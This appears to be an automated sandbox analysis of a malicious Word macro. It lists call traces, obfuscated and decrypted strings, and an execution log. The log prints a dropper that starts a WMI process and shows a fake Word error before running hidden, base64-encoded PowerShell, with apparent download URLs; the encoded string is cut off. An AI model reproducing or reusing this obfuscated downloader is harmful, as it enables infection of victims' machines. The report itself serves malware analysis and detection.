gAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgA,,) -> 0
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
V2enhc4htwl7z6bh
Thriap3q9rgf3yy9y
zZuzBZGD
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
OIbfvEEFF
Close
eLmLDU
FYVZFEH
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
hoyzuBGCP
Close
lADFBaJ

Strings	Decrypted Strings
"Jsnt2t9fi0a8nnsiaf""Bete9x47doew46v"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC"
"VrVKCjefsIJ"
"sxbwAfRtWJI"
"WLXLJnjItPGPZJ"
"]anw[3""p]anw[3"
"]an""w[3ro]anw[3]a""nw[3ce]anw[3s]anw[3s]anw[3]anw[3"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF"
"ImJJdfAtdFHCh"
"deVdMyoREdgzCaJb"
"XZzpBRpDKuMgsGHIHF"
"]anw[3:w]anw[3]anw[3i""n]anw[33]anw[32]anw[3_]anw[3"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf"
"uTtCAFwHpCGF"
"lwWhZGEasjsS"
"MiCjaGqJfPrI"
"w]anw[3in]anw[3m]an""w[3gm]anw[3t]anw[3]anw[3"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"HQGixyC:\vETCeBG\zIuEqsGG.NobmDA"
"dXFPCSYtSNB"
"KqVyuQQfwTWh"
"qDaYIDDSZQMTaO"
"]anw[3""]anw[3"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ"
"MxCpGaGqBgemCAFEJ"
"hbtzFRJEXyDCXI"
"zdTcdOoXXUFHJK"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo"
"hKlajOujwgDFAA"
"JMgUDAIEJlgyNBH"
"BUUJYAAIoJvLBLAo"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ"
"CVbRCAAhkhmcDG"
"XrrAwQZPjqB"
"fxSJajCGlWUEBW"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD"
"qiXBsMBsLJGbX"
"mehEFPFHcklgJDDx"
"BndJDkuVYF"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH"
"JTSPCDjykfL"
"bBmgOCvPPojGGC"
"anBQXljzGenE"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"pGMMG:\enlVVB\fMqiFP.kEIECDZHz"
"dnUnKFHAkIOdD"
"ekluIEBJFIgoBcGC"
"BnxHFzJCGhVHrFIm"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW"
"fDdPHEjBEnAdZqZFJ"
"wypNISsWSXthFJCq"
"LvnHAGHfIhRDBRAF"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA"
"DBvMcNtCcMyJDDI"
"eXpjHFapHaPdRJu"
"eXObOTlBAITEOIo"

Line	Instruction	Meta Information
2	Function G8xesq0b8jlsfrsp()
3	On Error Resume Next	executed
4	Dhubl2is48jort = "Jsnt2t9fi0a8nnsiaf" + "Bete9x47doew46v"
5	sf4 = Zw1k7hcmdl66 + A5gd21klfqu9c6rs.StoryRanges.Item(2 / 2) + Hyii7r76oq89	Zw1k7hcmdl66 Item Hyii7r76oq89
6	Goto SblcDCC
7	Dim pULquU as Object
8	Set ibIiBF = diCXTi	diCXTi
9	Set pULquU = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
10	Dim SblcDCC as Object
11	Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")	CreateTextFile
12	SblcDCC.WriteLine "VrVKCjefsIJ"	WriteLine
13	SblcDCC.WriteLine "sxbwAfRtWJI"	WriteLine
14	SblcDCC.WriteLine "WLXLJnjItPGPZJ"	WriteLine
15	Set jbUmDI = NZiApKAp	NZiApKAp
16	SblcDCC.Close	Close
17	Set pULquU = Nothing
18	Set MznOjBB = vrYYHIDxI	vrYYHIDxI
19	Set SblcDCC = Nothing
19	SblcDCC:
21	t3s = "]anw[3" + "p]anw[3"
22	K50yjh8o6l7s = "]an" + "w[3ro]anw[3]a" + "nw[3ce]anw[3s]anw[3s]anw[3]anw[3"
23	Goto fNhiCVgGS
24	Dim RyDBDK as Object
25	Set WTbkNqFa = gzTFLxb	gzTFLxb
26	Set RyDBDK = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
27	Dim fNhiCVgGS as Object
28	Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")	CreateTextFile
29	fNhiCVgGS.WriteLine "ImJJdfAtdFHCh"	WriteLine
30	fNhiCVgGS.WriteLine "deVdMyoREdgzCaJb"	WriteLine
31	fNhiCVgGS.WriteLine "XZzpBRpDKuMgsGHIHF"	WriteLine
32	Set OlapGi = PjNhJNA	PjNhJNA
33	fNhiCVgGS.Close	Close
34	Set RyDBDK = Nothing
35	Set yabVbA = oAaNlB	oAaNlB
36	Set fNhiCVgGS = Nothing
36	fNhiCVgGS:
38	Brlo236t2rmfu = "]anw[3:w]anw[3]anw[3i" + "n]anw[33]anw[32]anw[3_]anw[3"
39	Goto HCvCmAcHC
40	Dim iFTmFHFH as Object
41	Set UDSpFHqFJ = sySRJ	sySRJ
42	Set iFTmFHFH = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
43	Dim HCvCmAcHC as Object
44	Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")	CreateTextFile
45	HCvCmAcHC.WriteLine "uTtCAFwHpCGF"	WriteLine
46	HCvCmAcHC.WriteLine "lwWhZGEasjsS"	WriteLine
47	HCvCmAcHC.WriteLine "MiCjaGqJfPrI"	WriteLine
48	Set MmSDYCkJR = UwyYSBsBN	UwyYSBsBN
49	HCvCmAcHC.Close	Close
50	Set iFTmFHFH = Nothing
51	Set EISYDDB = tpOgXmm	tpOgXmm
52	Set HCvCmAcHC = Nothing
52	HCvCmAcHC:
54	Iogna_9cq5gv = "w]anw[3in]anw[3m]an" + "w[3gm]anw[3t]anw[3]anw[3"
55	Goto gEcrV
56	Dim RqlOZAHRJ as Object
57	Set jsYAGBJAF = MHYlQAD	MHYlQAD
58	Set RqlOZAHRJ = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
59	Dim gEcrV as Object
60	Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")	CreateTextFile
61	gEcrV.WriteLine "dXFPCSYtSNB"	WriteLine
62	gEcrV.WriteLine "KqVyuQQfwTWh"	WriteLine
63	gEcrV.WriteLine "qDaYIDDSZQMTaO"	WriteLine
64	Set IePCGy = GznGGHyG	GznGGHyG
65	gEcrV.Close	Close
66	Set RqlOZAHRJ = Nothing
67	Set cwsTFPCH = bbsIZ	bbsIZ
68	Set gEcrV = Nothing
68	gEcrV:
70	Fo4b_d8mj9usjgaha = "]anw[3" + "]anw[3" + Mid(Application.Name, 4 + 2, 2 - 1) + "]anw[" + "3]anw[3"	Mid Name Application
71	Goto ZMdrVHGz
72	Dim xsruLB as Object
73	Set fiyQuiRBI = swNGWdd	swNGWdd
74	Set xsruLB = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
75	Dim ZMdrVHGz as Object
76	Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")	CreateTextFile
77	ZMdrVHGz.WriteLine "MxCpGaGqBgemCAFEJ"	WriteLine
78	ZMdrVHGz.WriteLine "hbtzFRJEXyDCXI"	WriteLine
79	ZMdrVHGz.WriteLine "zdTcdOoXXUFHJK"	WriteLine
80	Set xPBGH = rJEkbLH	rJEkbLH
81	ZMdrVHGz.Close	Close
82	Set xsruLB = Nothing
83	Set dLRiF = vEBqHrDnD	vEBqHrDnD
84	Set ZMdrVHGz = Nothing
84	ZMdrVHGz:
86	K427k3xfk130n18n = Iogna_9cq5gv + Fo4b_d8mj9usjgaha + Brlo236t2rmfu + t3s + K50yjh8o6l7s
87	Goto fDZVKAAc
88	Dim tzErBRFe as Object
89	Set SeHafBC = tWcKo	tWcKo
90	Set tzErBRFe = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
91	Dim fDZVKAAc as Object
92	Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")	CreateTextFile
93	fDZVKAAc.WriteLine "hKlajOujwgDFAA"	WriteLine
94	fDZVKAAc.WriteLine "JMgUDAIEJlgyNBH"	WriteLine
95	fDZVKAAc.WriteLine "BUUJYAAIoJvLBLAo"	WriteLine
96	Set CHVmaVC = LzxxRHG	LzxxRHG
97	fDZVKAAc.Close	Close
98	Set tzErBRFe = Nothing
99	Set WlBWDXGD = EKezHIC	EKezHIC
100	Set fDZVKAAc = Nothing
100	fDZVKAAc:
102	Lutf6_3d403q9 = Jlda77h_v8nx5(K427k3xfk130n18n)
103	Goto rYbgBh
104	Dim hZCth as Object
105	Set LQqlBAHD = DpYbmDA	DpYbmDA
106	Set hZCth = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
107	Dim rYbgBh as Object
108	Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")	CreateTextFile
109	rYbgBh.WriteLine "CVbRCAAhkhmcDG"	WriteLine
110	rYbgBh.WriteLine "XrrAwQZPjqB"	WriteLine
111	rYbgBh.WriteLine "fxSJajCGlWUEBW"	WriteLine
112	Set phIwFD = hDJDJ	hDJDJ
113	rYbgBh.Close	Close
114	Set hZCth = Nothing
115	Set PnolTIbAB = dXiwA	dXiwA
116	Set rYbgBh = Nothing
116	rYbgBh:
118	Set Mwzin4vxc1irit = CreateObject(Lutf6_3d403q9)	CreateObject("winmgmts:win32_process") executed
119	Goto GfRPP
120	Dim xLQtMd as Object
121	Set uRnkDGJ = hFSyAfFrF	hFSyAfFrF
122	Set xLQtMd = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
123	Dim GfRPP as Object
124	Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")	CreateTextFile
125	GfRPP.WriteLine "qiXBsMBsLJGbX"	WriteLine
126	GfRPP.WriteLine "mehEFPFHcklgJDDx"	WriteLine
127	GfRPP.WriteLine "BndJDkuVYF"	WriteLine
128	Set xiFRA = hXxQDACJA	hXxQDACJA
129	GfRPP.Close	Close
130	Set xLQtMd = Nothing
131	Set jENfzNH = xkQqDXCcD	xkQqDXCcD
132	Set GfRPP = Nothing
132	GfRPP:
134	Jaaqx1xn5daotw = Mid(sf4, (1 + 4), Len(sf4))	Mid Len("\x01 ]anw[3]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3/]anw[3c]anw[3 ]anw[3m]anw[3s]anw[3g]anw[3 ]anw[3%]anw[3u]anw[3s]anw[3e]anw[3r]anw[3n]anw[3a]anw[3m]anw[3e]anw[3%]anw[3 ]anw[3/]anw[3v]anw[3 ]anw[3W]anw[3o]anw[3r]anw[3d]anw[3 ]anw[3e]anw[3x]anw[3p]anw[3e]anw[3r]anw[3i]anw[3e]anw[3n]anw[3c]anw[3e]anw[3d]anw[3 ]anw[3a]anw[3n]anw[3 ]anw[3e]anw[3r]anw[3r]anw[3o]anw[3r]anw[3 ]anw[3t]anw[3r]anw[3y]anw[3i]anw[3n]anw[3g]anw[3 ]anw[3t]anw[3o]anw[3 ]anw[3o]anw[3p]anw[3e]anw[3n]anw[3 ]anw[3t]anw[3h]anw[3e]anw[3 ]anw[3f]anw[3i]anw[3l]anw[3e]anw[3.]anw[3 ]anw[3&]anw[3 ]anw[3 ]anw[3P]anw[3^]anw[3O]anw[3w]anw[3^]anw[3e]anw[3r]anw[3^]anw[3s]anw[3h]anw[3e]anw[3^]anw[3L]anw[3^]anw[3L]anw[3 ]anw[3-]anw[3w]anw[3 ]anw[3h]anw[3i]anw[3d]anw[3d]anw[3e]anw[3n]anw[3 ]anw[3-]anw[3E]anw[3N]anw[3C]anw[3O]anw[3D]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 IAB]anw[3zAF]anw[3YAI]anw[3AAg]anw[3ACg]anw[3AIg]anw[3BLA]anw[3CIA]anw[3KwA]anw[3iAD]anw[3QAN]anw[3wBk]anw[3ACI]anw[3AKQ]anw[3AgA]anw[3CAA]anw[3KAB]anw[3bAH]anw[3QAW]anw[3QBQ]anw[3AGU]anw[3AXQ]anw[3AoA]anw[3CIA]anw[3ewA]anw[30AH]anw[30Ae]anw[3wAx]anw[3AH0]anw[3Aew]anw[3AwA]anw[3H0A]anw[3ewA]anw[3zAH]anw[30Ae]anw[3wAy]anw[3AH0]anw[3AIg]anw[3AtA]anw[3EYA]anw[3JwB]anw[3zAC]anw[3cAL]anw[3AAn]anw[3AHk]anw[3AJw]anw[3AsA]anw[3CcA]anw[3ZQB]anw[3jAF]anw[3QAb]anw[3wBy]anw[3AFk]anw[3AJw]anw[3AsA]anw[3CcA]anw[3VAB]anw[3FAG]anw[30AL]anw[3gBJ]anw[3AG8]anw[3ALg]anw[3BEA]anw[3EkA]anw[3cgA]anw[3nAC]anw[3wAJ]anw[3wBz]anw[3ACc]anw[3AKQ]anw[3ApA]anw[3CAA]anw[3IAA]anw[37AC]anw[3AAI]anw[3AAg]anw[3ACA]anw[3AJA]anw[3BXA]anw[3GkA]anw[3OAA]anw[3gAD]anw[30AW]anw[3wB0]anw[3AHk]anw[3AUA]anw[3BlA]anw[3F0A]anw[3KAA]anw[3iAH]anw[3sAM]anw[3gB9]anw[3AHs]anw[3AMw]anw[3B9A]anw[3HsA]anw[3NwB]anw[39AH]anw[3sAM]anw[3QB9]anw[3AHs]anw[3ANA]anw[3B9A]anw[3HsA]anw[3NgB]anw[39AH]anw[3sAN]anw[3QB9]anw[3AHs]anw[3AOA]anw[3B9A]anw[3HsA]anw[3MAB]anw[39AC]anw[3IAL]anw[3QBG]anw[3ACA]anw[3AJw]anw[3BnA]anw[3EUA]anw[3UgA]anw[3nAC]anw[3wAJ]anw[3wAu]anw[3AE4]anw[3AZQ]anw[3B0A]anw[3C4A]anw[3UwB]anw[3FAF]anw[3IAV]anw[3gAn]anw[3ACw]anw[3AJw]anw[3BTA]anw[3FkA]anw[3cwA]anw[3nAC]anw[3wAJ]anw[3wBU]anw[3AGU]anw[3AJw]anw[3AsA]anw[3CcA]anw[3SQA]anw[3nAC]anw[3wAJ]anw[3wB0]anw[3AG0]anw[3AQQ]anw[3AnA]anw[3CwA]anw[3JwB]anw[3DAG]anw[3UAU]anw[3ABP]anw[3AEk]anw[3ATg]anw[3AnA]anw[3CwA]anw[3JwB]anw[3tAC]anw[3cAL]anw[3AAn]anw[3AE4]anw[3AYQ]anw[3AnA]anw[3CkA]anw[3IAA]anw[37AC]anw[3AAJ]anw[3ABF]anw[3AHI]anw[3Acg]anw[3BvA]anw[3HIA]anw[3QQB]anw[3jAH]anw[3QAa]anw[3QBv]anw[3AG4]anw[3AUA]anw[3ByA]anw[3GUA]anw[3ZgB]anw[3lAH]anw[3IAZ]anw[3QBu]anw[3AGM]anw[3AZQ]anw[3AgA]anw[3D0A]anw[3IAA]anw[3oAC]anw[3gAJ]anw[3wBT]anw[3AGk]anw[3AbA]anw[3BlA]anw[3G4A]anw[3dAA]anw[3nAC]anw[3sAJ]anw[3wBs]anw[3AHk]anw[3AJw]anw[3ApA]anw[3CsA]anw[3JwB]anw[3DAC]anw[3cAK]anw[3wAo]anw[3ACc]anw[3Abw]anw[3BuA]anw[3CcA]anw[3KwA]anw[3nAH]anw[3QAa]anw[3QAn]anw[3ACk]anw[3AKw]anw[3AnA]anw[3G4A]anw[3JwA]anw[3rAC]anw[3cAd]anw[3QBl]anw[3ACc]anw[3AKQ]anw[3A7A]anw[3CQA]anw[3TwB]anw[3sAD]anw[3kAb]anw[3wBu]anw[3AGs]anw[3AaQ]anw[3A9A]anw[3CQA]anw[3QwA]anw[3wAD]anw[3IAV]anw[3wAg]anw[3ACs]anw[3AIA]anw[3BbA]anw[3GMA]anw[3aAB]anw[3hAH]anw[3IAX]anw[3QAo]anw[3ADY]anw[3ANA]anw[3ApA]anw[3CAA]anw[3KwA]anw[3gAC]anw[3QAQ]anw[3QAw]anw[3ADM]anw[3AUA]anw[3A7A]anw[3CQA]anw[3SAA]anw[3yAD]anw[3cAW]anw[3AA9]anw[3ACg]anw[3AJw]anw[3BJA]anw[3CcA]anw[3KwA]anw[3oAC]anw[3cAN]anw[3gAn]anw[3ACs]anw[3AJw]anw[3A3A]anw[3FEA]anw[3JwA]anw[3pAC]anw[3kAO]anw[3wAg]anw[3ACA]anw[3AKA]anw[3BnA]anw[3GkA]anw[3IAA]anw[3oAC]anw[3IAV]anw[3gBh]anw[3AFI]anw[3AIg]anw[3ArA]anw[3CIA]anw[3aQB]anw[3BAE]anw[3IAT]anw[3ABl]anw[3ADo]anw[3Aaw]anw[3AiA]anw[3CsA]anw[3IgA]anw[30AD]anw[3cAZ]anw[3AAi]anw[3ACk]anw[3AIA]anw[3AgA]anw[3CkA]anw[3LgB]anw[32AG]anw[3EAT]anw[3AB1]anw[3AGU]anw[3AOg]anw[3A6A]anw[3CIA]anw[3QwB]anw[3yAE]anw[3UAY]anw[3ABB]anw[3AGA]anw[3AVA]anw[3BgA]anw[3EUA]anw[3RAB]anw[3JAF]anw[3IAZ]anw[3QBD]anw[3AFQ]anw[3AYA]anw[3BPA]anw[3FIA]anw[3eQA]anw[3iAC]anw[3gAJ]anw[3ABI]anw[3AE8]anw[3ATQ]anw[3BFA]anw[3CAA]anw[3KwA]anw[3) -> 17689 executed
135	Goto sCOIGDtD
136	Dim eepvDEaE as Object
137	Set jzqBlGW = lBenBDA	lBenBDA
138	Set eepvDEaE = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
139	Dim sCOIGDtD as Object
140	Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")	CreateTextFile
